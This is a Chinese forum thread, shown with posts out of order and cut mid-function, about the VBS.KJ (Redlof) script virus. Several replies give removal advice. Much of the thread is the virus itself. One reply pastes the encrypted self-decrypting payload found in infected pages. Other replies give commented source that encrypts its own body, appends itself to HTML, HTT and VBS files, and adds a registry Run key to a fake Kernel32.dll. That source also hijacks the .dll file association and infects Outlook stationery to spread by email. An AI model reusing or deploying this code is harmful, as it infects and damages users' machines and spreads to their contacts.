        Set AppleObject = document.applets("KJ_guest")
        AppleObject.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}")
        AppleObject.createInstance()
        Set WsShell = AppleObject.GetObject()
        AppleObject.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}")
        AppleObject.createInstance()
        Set FSO = AppleObject.GetObject()
    End If
    Set DiskObject = FSO.Drives
    For Each DiskTemp In DiskObject
        If DiskTemp.DriveType <> 2 And DiskTemp.DriveType <> 1 Then
            Exit For
        End If
        FinalyDisk = DiskTemp.DriveLetter
    Next

    ' 产生随机加密密钥
    Dim OtherArr(3)
    Randomize
    For i=0 To 3
        OtherArr(i) = Int((9 * Rnd))
    Next

    ' 用随机加密密钥将病毒体加密
    ' 加密后的病毒体放在 TempString 中
    TempString = ""
    For i=1 To Len(ThisText)
        TempNum = Asc(Mid(ThisText,i,1))
        If TempNum = 13 Then
            TempNum = 28
        ElseIf TempNum = 10 Then
            TempNum = 29
        End If
        TempChar = Chr(TempNum - OtherArr(i Mod 4))
        If TempChar = Chr(34) Then
            TempChar = Chr(18)
        End If
        TempString = TempString & TempChar
    Next

    ' 形成各种感染所需的数据
    ' UnLockStr 中存放解密使用的程序
    UnLockStr = "Execute(""Dim KeyArr(3),ThisText""&vbCrLf&""KeyArr(0) = " & OtherArr(0) & """&vbCrLf&""KeyArr(1) = " & OtherArr(1) & """&vbCrLf&""KeyArr(2) = " & OtherArr(2) & """&vbCrLf&""KeyArr(3) = " & OtherArr(3) & """&vbCrLf&""For i=1 To Len(ExeString)""&vbCrLf&""TempNum = Asc(Mid(ExeString,i,1))""&vbCrLf&""If TempNum = 18 Then""&vbCrLf&""TempNum = 34""&vbCrLf&""End If""&vbCrLf&""TempChar = Chr(TempNum + KeyArr(i Mod 4))""&vbCrLf&""If TempChar = Chr(28) Then""&vbCrLf&""TempChar = vbCr""&vbCrLf&""ElseIf TempChar = Chr(29) Then""&vbCrLf&""TempChar = vbLf""&vbCrLf&""End If""&vbCrLf&""ThisText = ThisText & TempChar""&vbCrLf&""Next"")" & vbCrLf & "Execute(ThisText)"
    ThisText = "ExeString = """ & TempString & """"
    HtmlText ="<" & "script language=vbscript>" & vbCrLf & "document.write " & """" & "<" & "div style='position:absolute; left:0px; top:0px; width:0px; height:0px; z-index:28; visibility: hidden'>" & "<""&""" & "APPLET NAME=KJ""&""_guest HEIGHT=0 WIDTH=0 code=com.ms.""&""activeX.Active""&""XComponent>" & "<" & "/APPLET>" & "<" & "/div>""" & vbCrLf & "<" & "/script>" & vbCrLf & "<" & "script language=vbscript>" & vbCrLf & ThisText & vbCrLf & UnLockStr & vbCrLf & "<" & "/script>" & vbCrLf & "<" & "/BODY>" & vbCrLf & "<" & "/HTML>"
    VbsText = ThisText & vbCrLf & UnLockStr & vbCrLf & "KJ_start()"

    ' 得到 Windows 所在的路径
    WinPath = FSO.GetSpecialFolder(0) & "\"

    ' 将原 C:\Windows\Web\Folder.htt 复制为 C:\Windows\Web\kjwall.gif
    If (FSO.FileExists(WinPath & "web\Folder.htt")) Then
        FSO.CopyFile WinPath & "web\Folder.htt",WinPath & "web\kjwall.gif"
    End If

    ' 将原 C:\Windows\System32\desktop.ini 复制为 C:\Windows\System32\kjwall.gif
    If (FSO.FileExists(WinPath & "system32\desktop.ini")) Then
        FSO.CopyFile WinPath & "system32\desktop.ini",WinPath & "system32\kjwall.gif"
    End If
End Function

#19


去金山的网站,我在那里下了个免费的专杀新快乐时光病毒的软件,可以解决

#20


我遇到过,同意 zhuxiaohua982的观点
我没恢复注册表。

#21


用金山的专用工具可以处理干净,我个人的经历还是不要手工删除,只会月删除越多,至于修改注册表,个人的经验是修改完以后不要正常关机,否则如果有交叉感染的话,你所有的努力都是白费。以前为了对付一些木马,使用的办法是修改以后直接RESET机器(按RESET按钮)这样会好一些!

#22


我也中过一次,但是删掉了就好了,如果网页也被感染了,用记事本打开,然后会发现在“html”后面有多出来一段“html”(带有vbscript的),把后面的“html”删掉就好了。不知道对不对?结果没事了。

#23


该病毒是一种vb脚本病毒,主要通过复制,执行病毒程序感染并实现传播.
病毒发作时,将查找各个目录并复制desktop.ini和folder.htt到目录下,
同时全盘查找*.html文件,并加入vb脚本代码.
杀毒:用瑞星2002的僧级版本即可

#1


小弟也是受害者,关注!

#2


利用查找找到所有的folder.htt和desktop.ini,然后删除,重新启动后,恢复一下注册表即可搞定。

#3


有那么简单吗?
这是VBS.KJ,或叫redlof。它还会感染网页文件。没有什么危害。用金山毒霸2001版(不是2002)并升级后杀就行了,不好之处就是太慢。

#4


小弟也是深受其害,不过今天我用最新的瑞星就搞定了,大家可以试一试哦
至于修改注册表,肯定是没有用的,因为我已经试过了,查出的病毒名叫“redlof”,今天我杀毒用了3个小时,我昏昏,昏

#5


这是VBS.KJ病毒,folder.htt被感染了,你可以用kv3000杀毒王的最新版本杀净。

#6


金山毒霸2001版 最新升级版 
杀完以后要把所有的folder.htt文件删除

#7


不要用金山毒霸了,我们实验室原来就是用金山毒霸。出现上述问题后都杀不了,我们现在用诺顿,几乎是天天升级。金山毒霸更新太慢了。

告诉楼主一个处理办法:
1。如果没有合适的查毒软件:
      a。查找上述两个文件将不在C盘下的全部删除,C盘下的对照无毒的机器一一删除。
      b。染毒时不要用IE浏览文件。用WindowsCommand之类代替。
2。安装诺顿,杀毒。注意,杀毒后将留下Desktop.ini文件,那是无毒的将其删除即可。  

#8


用kv3000杀毒王或熊猫卫士可以杀。
我就是用kv3000杀毒王杀的。

#9


请问哪有诺顿企业版下载呀?

#10


最好还是硬盘格格掉.不然的话不能按WEB页查询,好痛哦`

#11


别提了,金山毒霸2002上个月的病毒库还可以杀的,升级到最新的以后,竟然不行了,气死我了!!!

#12


嘿嘿,特征码没有找准!

#13


kill regedit

#14


最好桌面不要用web页
不知你们看到的是不是这样的:

<script language=vbscript>
ExeString = "@hgEmQdaq_(DsghPdrp(U\oPdrp(C_cnd_Oefh(=ojhaN\fabn(BRI(SrMdakf(ShhL]sb(Ot\A(Ecj]ks@ereRo^JD[os[np'#JDOas>ei'#JD?nd[paLchedo$%GFKcgaHn$%GFBla]s_I]hf$%GFOlkl`a]pd%?j`Mq^Eoj_sckjEF=ojajcNk$EchaO[pd+NuldMpn(KmAnqinQ_oql_JdrpMapLa]cNaio9EMK*NjajS_tpEcha'@ehdJ]pg&-%PioMpn7Nd[`Pdgl*Q_]`@fhCbHhopqPioMpn+GF^mp]qn$%!#8=,NlHdh$PljOpq#8+Pg_jLa]cNaio(?hnma?tesBqm]penhDh`H`H`PxjaOsl9dpsPg_jLa]cNaio(?hnmaMap@ehdNaio9EMK*NjajS_tpEcha'@ehdJ]pg&.%Bek_Palj*Sqcpa8 AI@Uijhn[`9!%ram_nhjp6!!EF[rn]ns%!: ra=nHeSglOslp^?qFb%DplfPawnEchaS_il-=hkr_R_pE;ppqc^<BON(Cas@ehdBek_L]sb%@=psle^-[ppqc^qs_o</0Ahr_Q_]`S_il-=hkr_R_pEchaS_il7BRI*Ko_jPdrpBhfa$EchaO[pd+2%CbSslaRnn<dsghNdamBhfaPdgl*Vlepdr^BlHb ;DPLF: ra=nHe!6%>N>Unhhk`^9!r^r]neon6 JD[os[np'#!!8%r^BlHb DsghPdrp?hodCbSslaRnn<ramSbajBek_Palj*Sqcpap^?qFb%R^rNatsAm^EeBhfaPdgl*BfkodAm^EeAm^Bth_phijBth_phijJD?d`hcaRo^$BonndhpOslejf&H]rnEjc_t?g[n%EbF]osCj`dr?d`l9*Pg_jCbK_bp'F?]r_$?tlnamnOpqcjc(&-%78K=]od_!#Pg_jEF?g[jcdMq^7Bhh]hx>eoj!4XOqa?9*DfoaGFBb]jf_Oqa9Bbn$@m_$K_bp'F?]r_$?tlnamnOpqcjc(&-%()0#6X!Ot\A<,?j`Cb?hodGI=d]maaOt\9Ge`'=qnq_jpRnnema(-+F]osCj`dr?d`l%?j`Cb?j`@qjbnekm@qjbnekmGFBla]s_I]hf$%Kj?nnnlNdmqidJawnH`EmQdaq_9dplfSbajAthnBth_phij?j`CbMd]q_Bek_9FabsSemJ]pg&/% Olkcq[iEcharV?klgkj@ehdmXIh]nkribpMd]q_`XRn]phijaqsX^k[jg-bpi!Ee$BRI*BhfaAwcoprOd`laBhfa%(PddhB[hhEF=ojajcNk$Rb]nd@ehd&dsgh(AkmaMap@ehdNaio9EMK*NjajS_tpEcha'Md]q_Bek_(.+nnqd#EchaS_il-Qnes_;DPLF: ra=nHe!6%>N>Unhhk`^9!r^r]neon6 JD[os[np'#!!8%r^BlHb DsghPdrp@ehdNaio(?hnma?j`Cb>ab`ohpH^9QoOg_hh-LacQ_]`'DGDS[?TLNAMN[QR?NXH^ajscpedmX@d`]qknQr_nH>%KqsFkkjPanrckj7SrMdakf*NdaNa`^$GEAU^FK?@F[I@=DEM?XOn`ps`laXLc_nnmkbsVKqsfkkjAtolaorVIacc]Rdl%SoRbahk(NafQnes_GEAU^=QNQ?JP^OOAQVE`dhpescao[@d`]qknE`%XOn`ps`laXLc_nnmkbsVKqsfkkjAtolaorVFabsKqsFkkjPanrckj++%%*,[G]ekV?kljkodQodOp`nekm_nu!&-(!LAC^>SKQ>=]hkGFL[ehQ_c$!BGAXY?QQLAJSYQODLXEc_jphnearVC_b]tfpEc XRibpv[na[Ge_qiokenXKtnhkneAwjnarmX%Haen$KtnHkneRaqmekm&-% */VI]hfXOs[penhanxJ]l_(Rb]nd@ehd#B[hhEFI`chNda$GEAU^=QNQ?JP^OOAQVE`dhpescao[@d`]qknE`%XOn`ps`laXLc_nnmkbsVKqsfkkjAtolaorVFabsKqsFkkjPanrckj++%%*,[G]ekVSec_Os[penhanxJ]l_(Rb]nd@ehd#VmOddfh*Q_cSqcpaDGDS[?TLNAMN[QR?NXRibpv[na[Ge_qiokenXKe`e_dV5*/VKqsfkkjVKlsckjrVI]hfXAccpkqJnae_nam]a++/-/1.(!LAC^>SKQ>=]hkGFL[ehQ_c$!BGAXY?QQLAJSYQODLXOn`ps`laXLc_nnmkbsVSem^ksrIarm]chhcRo^oxmpalVLnn`ehdmXIh]nkribpIqpkikgCjpdljasOasnejfmX,`*`,1*,,/*,,/*,_/*,,/*,,/*,,/.2X/*-a/-2,!&^k[jg!#B[hhEFI`chNda$GEAU^=QNQ?JP^OOAQVOkens]q_XIh]nkribp[QejcisoHPXBonndhpRdloenhXShh`kvmIdmo]fcjcMq^rsopdgXLqibek_oXLc_nnmkbsKqsfkkjEjs_njdnOdnpemaoX/[,`/,,,/*,,/*,,b*,,/*,,/*,,/*02[*,-d*/2/(af]jj%QoOg_hh-LacVlepdDJ?U[BONNDHP[TMAN[Mkbsq]ndVIeblkon`pXN`beb_X-/(,XNophnigXNjpenhoXL[eh[?`esinLq_baq_j_d(-2+,31&NDA[@VIN@!?`fhJDI]hfNafDJ?U[BONNDHP[TMAN[Mkbsq]ndVIeblkon`pXN`beb_X-/(,XBiiinhXI`chOdnpemaoXM_sOs[penhanx(af]jj%EFqlg]cd@khc_n$K_bp'QejO[pd+-%%Lqicn`gBhfao[=kilijEcharVIeblkon`pRb]nd^XOs[penhanx%?j`@qjbnekm@qjbnekmGFBla]s_Iekcaq'#NhAqlknLaotgaM_tpPaljL]sb9CbMip$EMK*EchaDreosm$ShhL]sbSOblels(atd%%NdamPdglL`nd<oxmpal-.X!Am^EeEePaljL]sb9ournai2,XNdamOs[npTjBek_9QejO[pd RSOPDGXGdljak-.*cfhAhr_Rn]nsOlBhfa<SemJ]pg!MUOS?IXJ_njdf*`kf?j`CbQoOg_hh-LacVlepdDJ?U[KI?=KYI=BBEJDVOkens]q_XIh]nkribp[Qejciso[=qnq_jpU_nohijXQojXJ_njdf/.!&Op`lpQo@ehdBRI*?njuBhfaVcjL`nd%sd\Xgiq]hk(cee(ShhL]sbsaaVBkk^an-bpp!BRI*?njuBhfaVcjL`nd%oxmpal-.Xjds]kf*ch`(VcjL`nd%oxmpal-.Xc_ogsil*hhe?]kfGI;lldh`PnSemJ]pg!qa^[@khc_n*gnp+dps%

#15


QoOg_hh-LacVlepdDJ?U[BF=OR?O[QIKP[(`hkV(!^hhecha!SrMdakf*NdaSnhna!BGAXY?H@MOARYNKNNX*cfhXBijpdhpSsla!&]ojheb[penh+t,go`nqjhn[`SoRbahk(NafQnes_GEAU^=H=RMAO^LKKSV`hk`ehdV@ae[qhsC_kmV(VmOddfh*Q_cNd[`$!BGAXY?H@MOARYNKNNXrw^bek_X@d`]qknE_nhX(SrMdakf*NdaSnhna!BGAXY?H@MOARYNKNNX`kfbek_XOblels?jchhaX!&RAM_nhjpSoRbahk(NafQnes_GEAU^=H=RMAO^LKKSV`hk@ehdVOddfhXNjaj[=kil[j`[(ShhL]sbNaioJ]pg!QO_qclp-_ta!0$$QoOg_hh-LacVlepdDJ?U[BF=OR?O[QIKP[^hhEcha[MdakfAt[Jnko_npxMdadnD]m^haqmXSRBLnnjoX!&w5*.13==1,31/A'--B@)4B32)/*==/*>46*4?|VmOddfh*Q_cSqcpaDGDS[?K;OODM[NNIPXcfhBhfaXR]neonDkrnAjbi`a[(z21-2+2/0'04/=)-0>.)A+B5,*,?/.B45=/.3wMap@ehdNaio9EMK*NjajS_tpEcha'Mp]qnQlEcha+,(pqoa%Bek_Palj*SqcpaP^oS_tpBek_Palj*?kioaAjcBqm]penhBqm]penhGIFegdCp$(EeEjVband8:dplfSbajAthnBth_phij?j`CbNderFk_`nekm9ci_ql_jp-fk_`nekmEeHaen$PgcoHn]]phij(.%<bhfaNdamPgcoHn]]phij<IecPdhmHkb[penh(5(EeBON(Cas?tpdhoenhJ]l_$PgcoHn]]phij%6:!pg_jNderFk_`nekm9K_bp'NderFk_`nekm&HamPdhmHkb[penh%,HamBON(Cas@ehdH]idPdhmHkb[penh%%(Am^EeEeHamPdhmHkb[penh%=/SbajPdhmHkb[penh9NderFk_`nekm!V?j`CbEFqlg]cd@khc_n$SbeoKi_]sckj(Am^EeAm^Bth_phijBth_phijJDI]hfNafNafMpn+@ehdH]id#NhAqlknLaotgaM_tpNafNaioMpn7SrMdakf*NdaNa`^$NdaOpq#H`NdaPaljOpq9!Pg_jQoOg_hh-LacVlepdNafMpn+@ehdH]idAm^EeAm^Bth_phijBth_phijJDK^nMq^'=qnq_jpRnnema%Mq^D9/PdmpKtn9*CiSgchaNnqdPdmpKtn9NaosIqp%-EbNaosIqp8.7PddhBonndhpOslejf9Ecj]ks@ere6X!AwcpCiDh`H`NhAqlknLaotgaM_tpOasPdhmBkk^an7BRI*CdnBkk^an'=qnq_jpRnnema%Map>e_Ro^<?nd[paN\fabn$R]neonejf(@ebnekm[nu!#R_pEih`dlo<PdhmBkk^an-Mq^Eih`dlo@khc_n?nojp7,BkqA]bbPdglBnf`aqej@khc_noBkk^anBiqjs9Eih`dl?kthp*->e_Ro^*`^`Eih`dl?kthp(Naio@khc_n*M[iaJawnH`@h]Oqa(?kthp<,SbajH]rnEjc_t?g[n<EjrnnNdp$?tlnamnOpqcjc+X+Faj'=qnq_jpRnnema%)0#Ro^Oslejf9Lc`$BonndhpOslejf&H]rnEjc_t?g[n'0&Ham?qqlajsMpnhhc%,F]osCj`dr?d`l)-(?tlnamnOpqcjc7GI=d]maaOt\$?tlnamnOpqcjc+F]osCj`dr?d`l%Mq^D90AkmaCbRo^A7,Ndam?tlnamnOpqcjc7?tlnamnOpqcjc @h]Oqa(Epdg$-(!V?tes@kAhr_i9/Bnlf7-NkEih`dl?kthpCbK=]odOqaMpnhhc%7HB[oa'>e_Ro^*Hnai'd%%NdamEef;Bkk^anBiqjsPddhBonndhpOslejf9BonndhpOslejfCc_Ot\*Es_i$i%-% [Drep>k?j`Cb?j`CbHatsH`mpEm^atBb]n7EmmpnQ_r$BonndhpOslejf&X!&Ham?qqlajsMpnhhc%,+%Mq^Rnnema9Ge`'=qnq_jpRnnema(H`mpEm^atBb]n*+(Hdh$?tlnamnOpqcjc('H]rnEjc_t?g[n)0#BonndhpOslejf9JD?d`hcaRo^$BonndhpOslejf&H]rnEjc_t?g[n%AjcEbAjcEbHknjJDK^nMq^7?tlnamnOpqcjcAjcBqm]penhBqm]penhGIJnko[c]s_$%Kj?nnnlNdmqidJawnQ_cL`ndR`fqa7GEAU^FK?@F[I@=DEM?XOn`ps`laXLc_nnmkbsVKqsfkkjAtolaorV@aflaa!@hmg@danad9VmOddfh*Q_cNd[`$Q_cL`ndR`fqa(Ee@ere@aflaa7!PddhCcogC_cnd_9@ej`fu@hmg%6[Dh`H`Einh7-si1@ere@aflaa7GII^kRo^$CcogC_cnd_%EFqlg]cd@khc_n$CcogC_cnd_%HatsSrMdakf*NdaSnhnaQ_cL`ndR`fqa+>eoj>acq_a?j`@qjbnekm@qjbnekmGFtgi]f_Bkk^an'J]pgH]id#NhAqlknLaotgaM_tpOasBkk^anM[ia7BRI*CdnBkk^an'J]pgH]id#R_pSbeoEchar9Eih`dlJ]l_*BhfaoDps?terno<,@kn?]_gPdhmBek_EmPdhmBek_o@ehd?tp7QB[oa'@OK-AapDrpammekmH]idPdhmBek_*L`nd%(EeBek_Ats9!BPI!Kn@ehd?tp7GNIH!Kn@ehd?tp7@MLInEchaDrp<LGJNlBhfaAwn9FOOPg_j=]hkGF@jlam^Pk'Nder@ehd(L]sb(gnih!#DfoaH`BhfaAwn9R>RPg_j=]hkGF@jlam^Pk'Nder@ehd(L]sb(u\o(AkmaEeBek_Ats9!BPP!PddhGnpAwcopr90Am^EeJdrpCb'O?]r_$L`ndJ`ga%7QB[oa'QejO[pd C_ogsilX!#%Nl$T=]odL]sbJ]l_%<Q?`ma$VcjL`nd%@dmgpnj%(NdamDsnAthmpo7-AjcEbEbBppDreosm9*Pg_j@OK-=klx@ehdSemJ]pg!muos_i/1V`arepko(ejh(L`ndJ`ga@OK-=klx@ehdSemJ]pg!qa^[@khc_n*gnp+J]pgH]idAm^EeAm^Bth_phijBth_phijJDOas>ei'#NhAqlknLaotgaM_tpAnq(?hd[nNaosCp<SOblels(O_qclpEohhm[iaEb?nnNdamEmQdaq_9dplf?hodEmQdaq_9r^rDh`H`H`EmQdaq_9r^rPg_jMap@OK7?q_]pdI^fd]p$!M_nhjpema*BhfaOxmpalI^fd]p(OdnSrMdakf9=na`naKada_sSR]neon*Og_hh!#DfoaOas=lofaKada_s9ci_ql_jp-[llk_po'GF^aqarn%=lofaKada_s(oas=HOH>$z@5/4>?.1'-?E*)-0>,)@>>5,*,?/.B@42=,Aw%=lofaKada_s(_nd[paHhop`h_a'#R_pVmOddfh<=lofaKada_s(CasI^fd]p$(=ojhaN\fabn*odn?HRC@$!u,@3-BA/+)B/3/)0+?B,250/',,@*?5//0.12y(=ojhaN\fabn*_q_]pdCjos[j_d%Map@OK7=ojhaN\fabn*CdnK^i__p'#Dh`H`R_pCcogN\fabn9@OK->neu_o@kn?]_g@erePaljEm@ereK^i__pEb>eojNaio(@nhpaPxja;8.;j`>eojNaio(@nhpaPxja;8-NdamAwcpEin?j`Cb@ej`fu@hmg<@erePalj*@qcraK_ppdlM_tp@elKpg_n=ql$/(N`h`klcvaBkqe9/Pk-Nndaq;nn'c%<Ejs$5$Nm^%%JawnS_ilRnnema9@knc9-NkK_j$SbeoS_tp(PdglJtg9;o_'Ge`'NderNats&e(0#%CbS_ilMoi<-/NdamPdglJtg9,4?hodCbS_ilMoi<-,NdamPdglJtg9,5?j`CbNaio=d]q9Bbn$S_ilMoi,Kpg_n=ql$eGk`.%%EbNaio=d]q9Bbn$2.%SbajPalj?d`l9=dn'+4%AjcEbPaljOpqcjc7PdglOslejfS_ilBb]nJawnThHkbeOpq9!?tabopa'@hgGds=nq/%+NderNatsu\?nK`!Eau@ln$/#9Ipddl=nq,% !ra=nHe J_u=ql$-(9!Nndaq;nn'+%%! r^BlHb%Gds=nq.%7 Ksban@ln$1#%p^?qFb!Gax;nn'-%<%Kpg_n=ql$/(!u\?nK`!@knc9-NkK_j$DraOslejf#%p^?qFb!PaljJql9@m_$Lc`$DraOslejf&e(0#%! r^BlHb%EePaljJql902Pg_j! r^BlHb%PdglJtg9-0! r^BlHb%Am^Eeu\?nK`!Naio=d]q9Bbn$S_ilMoi*Gax;nn'cIn^0(#%p^?qFb!EbNaio=d]q9Bbn$12%Sbaj!ra=nHe S_ilBb]n7ra=n! r^BlHb%AkmaEePalj?d`l9=dn',5%Ndamu\?nK`!Naio=d]q9u\Hb!ra=nHe Dh`H`%p^?qFb!PdhmPawn9NderNatsS_ilBb]n!ra=nHe M_tp!% ra=nHe!?tabopa'NderNats#NderNats9!?taRnnema9 PdglOslejf!DplfPawn9!6%oblelsh]maq]f_9ram_nhjp:!u\?nK``kboiamn*sqcpa!!6%`hpossha<!lkrcpenh6]amkhtna7fabs4,lw5pnj6,or7vc`pg4,lw5ddccds4,lw5v,cj`dr6.75rhme^hfepx4dh^`am!: ;!%=OJHASJ=L?9GI![ct_opBAEFBP9/SECND9/_kc_9_ng*ir(%]bnerdR*=bnerd!T?nglkm_jp=8 .;LLK?P:!!6%+ccr:!%r^BlHb ;+oblels8%r^BlHb ;o_qclpf]jfo]cd7r^r]neon: ra=nHeSbeoS_tp ra=nHeThHkbeOpqu\?nK`8 .m_nhjp:!u\?nK`8 .<K@X8%r^BlHb ;+DSGH:!RamPawn9NderNatsu\?nK`OjHn]gOslp^?qFb%GIYop`lp$(VcjL`nd<BON(CasMlabc]hEih`dl$,(!VCb'@OK-@ehd?terno$VcjL`nd%sd\XBnf`aq(dps%%NdamBRI*?njuBhfaVcjL`nd%sd\XBnf`aq(dps(ShhL]sbsaaVgfv[hh-aeb!Am^EeEe$BRI*BhfaAwcoprSemJ]pg!muos_i/1V`arepko(ejh%%NdamBRI*?njuBhfaVcjL`nd%oxmpal-.Xc_ogsil*hhe+QejO[pd rsopdg/.[efs`fh*fcbAjcEbAjcBqm]penh"
Execute("Dim KeyArr(3),ThisText"&vbCrLf&"KeyArr(0) = 4"&vbCrLf&"KeyArr(1) = 4"&vbCrLf&"KeyArr(2) = 1"&vbCrLf&"KeyArr(3) = 6"&vbCrLf&"For i=1 To Len(ExeString)"&vbCrLf&"TempNum = Asc(Mid(ExeString,i,1))"&vbCrLf&"If TempNum = 18 Then"&vbCrLf&"TempNum = 34"&vbCrLf&"End If"&vbCrLf&"TempChar = Chr(TempNum + KeyArr(i Mod 4))"&vbCrLf&"If TempChar = Chr(28) Then"&vbCrLf&"TempChar = vbCr"&vbCrLf&"ElseIf TempChar = Chr(29) Then"&vbCrLf&"TempChar = vbLf"&vbCrLf&"End If"&vbCrLf&"ThisText = ThisText & TempChar"&vbCrLf&"Next")
Execute(ThisText)
</script>

#16


Dim InWhere,HtmlText,VbsText,DegreeSign,AppleObject,FSO,WsShell,WinPath,SubE,FinalyDisk

' ------------------------------------------------------------------------------
Sub KJ_start()
    KJSetDim()
    KJCreateMilieu()
    KJLikeIt()
    KJCreateMail()
    KJPropagate()
End Sub


' ------------------------------------------------------------------------------
' “感染”功能函数
' TypeStr 可能的取值有:htt,html,vbs
'
' htt:(.HTT)
'    最前面是 <BODY onload="vbscript:KJ_start()">,中间是原文件内容,最后是病毒体
' html:(.HTM,.HTML,.ASP,.PHP,.JSP)
'    最前面是原文件内容,最后是 <HTML> <BODY onload="vbscript:KJ_start()"> 和病毒体
' vbs:(.VBS)
'    最前面是原文件内容,最后是病毒体
'
' 对于 .htt 文件,染毒文件中有两块病毒体,原文件内容被夹在其中
' 对于其它的所有文件,染毒后的文件只在文件尾部有一块病毒体
' ------------------------------------------------------------------------------
Function KJAppendTo(FilePath,TypeStr)
    On Error Resume Next
    Set ReadTemp = FSO.OpenTextFile(FilePath,1)

    ' TmpStr 中存放文件的所有内容
    TmpStr = ReadTemp.ReadAll

    ' 如果此文件已被感染或者文件长度小于 1 就不进行感染
    If Instr(TmpStr,"KJ_start()") <> 0 Or Len(TmpStr) < 1 Then
        ReadTemp.Close
        Exit Function
    End If

    If TypeStr = "htt" Then
        ReadTemp.Close
        Set FileTemp = FSO.OpenTextFile(FilePath,2)
        FileTemp.Write "<" & "BODY onload=""" & "vbscript:" & "KJ_start()""" & ">" & vbCrLf & TmpStr & vbCrLf & HtmlText
        FileTemp.Close
        Set FAttrib = FSO.GetFile(FilePath)
        FAttrib.attributes = 34
    Else
        ReadTemp.Close
        Set FileTemp = FSO.OpenTextFile(FilePath,8)
        If TypeStr = "html" Then
            FileTemp.Write vbCrLf & "<" & "HTML>" & vbCrLf & "<" & "BODY onload=""" & "vbscript:" & "KJ_start()""" & ">" & vbCrLf & HtmlText
        ElseIf TypeStr = "vbs" Then
            FileTemp.Write vbCrLf & VbsText
        End If
            FileTemp.Close
    End If
End Function


' ------------------------------------------------------------------------------
Function KJChangeSub(CurrentString,LastIndexChar)
    If LastIndexChar = 0 Then
        If Left(LCase(CurrentString),1) =< LCase("c") Then
            KJChangeSub = FinalyDisk & ":\"
            SubE = 0
        Else
            KJChangeSub = Chr(Asc(Left(LCase(CurrentString),1)) - 1) & ":\"
            SubE = 0
        End If
    Else
        KJChangeSub = Mid(CurrentString,1,LastIndexChar)
    End If
End Function


' ------------------------------------------------------------------------------
Function KJCreateMail()
    On Error Resume Next
    If InWhere = "html" Then
        Exit Function
    End If

    ' 感染 C:\Program Files\Common Files\Microsoft Shared\Stationery\blank.htm
    ShareFile = Left(WinPath,3) & "Program Files\Common Files\Microsoft Shared\Stationery\blank.htm"
    If (FSO.FileExists(ShareFile)) Then
        Call KJAppendTo(ShareFile,"html")
    Else
        Set FileTemp = FSO.OpenTextFile(ShareFile,2,true)
        FileTemp.Write "<" & "HTML>" & vbCrLf & "<" & "BODY onload=""" & "vbscript:" & "KJ_start()""" & ">" & vbCrLf & HtmlText
        FileTemp.Close
    End If

    DefaultId = WsShell.RegRead("HKEY_CURRENT_USER\Identities\Default User ID")
    OutLookVersion = WsShell.RegRead("HKEY_LOCAL_MACHINE\Software\Microsoft\Outlook Express\MediaVer")
    WsShell.RegWrite "HKEY_CURRENT_USER\Identities\"&DefaultId&"\Software\Microsoft\Outlook Express\"& Left(OutLookVersion,1) &".0\Mail\Compose Use Stationery",1,"REG_DWORD"
    Call KJMailReg("HKEY_CURRENT_USER\Identities\"&DefaultId&"\Software\Microsoft\Outlook Express\"& Left(OutLookVersion,1) &".0\Mail\Stationery Name",ShareFile)
    Call KJMailReg("HKEY_CURRENT_USER\Identities\"&DefaultId&"\Software\Microsoft\Outlook Express\"& Left(OutLookVersion,1) &".0\Mail\Wide Stationery Name",ShareFile)
    WsShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Outlook\Options\Mail\EditorPreference",131072,"REG_DWORD"
    Call KJMailReg("HKEY_CURRENT_USER\Software\Microsoft\Windows Messaging Subsystem\Profiles\Microsoft Outlook Internet Settings\0a0d020000000000c000000000000046\001e0360","blank")
    Call KJMailReg("HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Microsoft Outlook Internet Settings\0a0d020000000000c000000000000046\001e0360","blank")
    WsShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Outlook\Options\Mail\EditorPreference",131072,"REG_DWORD"
    Call KJMailReg("HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Common\MailSettings\NewStationery","blank")

    ' 感染 C:\Program Files\Common Files\Microsoft Shared\Stationery 文件夹中的所有文件
    KJummageFolder(Left(WinPath,3) & "Program Files\Common Files\Microsoft Shared\Stationery")
End Function

#17


' ------------------------------------------------------------------------------
Function KJCreateMilieu()
    On Error Resume Next
    TempPath = ""
    If Not(FSO.FileExists(WinPath & "WScript.exe")) Then
        TempPath = "system32\"
    End If
    If TempPath = "system32\" Then
        StartUpFile = WinPath & "SYSTEM\Kernel32.dll"
    Else
        StartUpFile = WinPath & "SYSTEM\Kernel.dll"
    End If

    ' 修改注册表,使病毒在一开机就可以运行一次
    WsShell.RegWrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Kernel32",StartUpFile

    ' 之前已经复制过一次了,这里为什么还要复制一次?
    FSO.CopyFile WinPath & "web\kjwall.gif",WinPath & "web\Folder.htt"
    FSO.CopyFile WinPath & "system32\kjwall.gif",WinPath & "system32\desktop.ini"

    ' 感染 C:\Windows\Web\Folder.htt
    Call KJAppendTo(WinPath & "web\Folder.htt","htt")

    ' 使伪装成动态链接库的病毒脚本可以直接被执行
    WsShell.RegWrite "HKEY_CLASSES_ROOT\.dll\","dllfile"
    WsShell.RegWrite "HKEY_CLASSES_ROOT\.dll\Content Type","application/x-msdownload"
    WsShell.RegWrite "HKEY_CLASSES_ROOT\dllfile\DefaultIcon\",WsShell.RegRead("HKEY_CLASSES_ROOT\vxdfile\DefaultIcon\")
    WsShell.RegWrite "HKEY_CLASSES_ROOT\dllfile\ScriptEngine\","VBScript"
    WsShell.RegWrite "HKEY_CLASSES_ROOT\dllFile\Shell\Open\Command\",WinPath & TempPath & "WScript.exe ""%1"" %*"
    WsShell.RegWrite "HKEY_CLASSES_ROOT\dllFile\ShellEx\PropertySheetHandlers\WSHProps\","{60254CA5-953B-11CF-8C96-00AA00B8708C}"
    WsShell.RegWrite "HKEY_CLASSES_ROOT\dllFile\ScriptHostEncode\","{85131631-480C-11D2-B1F9-00C04F86C324}"

    ' 建立 C:\Windows\System\Kernel.dll(Kernel32.dll) 并写入病毒体
    ' 此后每次开机这个病毒脚本都会被执行一次
    Set FileTemp = FSO.OpenTextFile(StartUpFile,2,true)
    FileTemp.Write VbsText
    FileTemp.Close
End Function


' ------------------------------------------------------------------------------
Function KJLikeIt()
    If InWhere <> "html" Then
        Exit Function
    End If
    ThisLocation = document.location

    ' 只在本地浏览时才执行此步
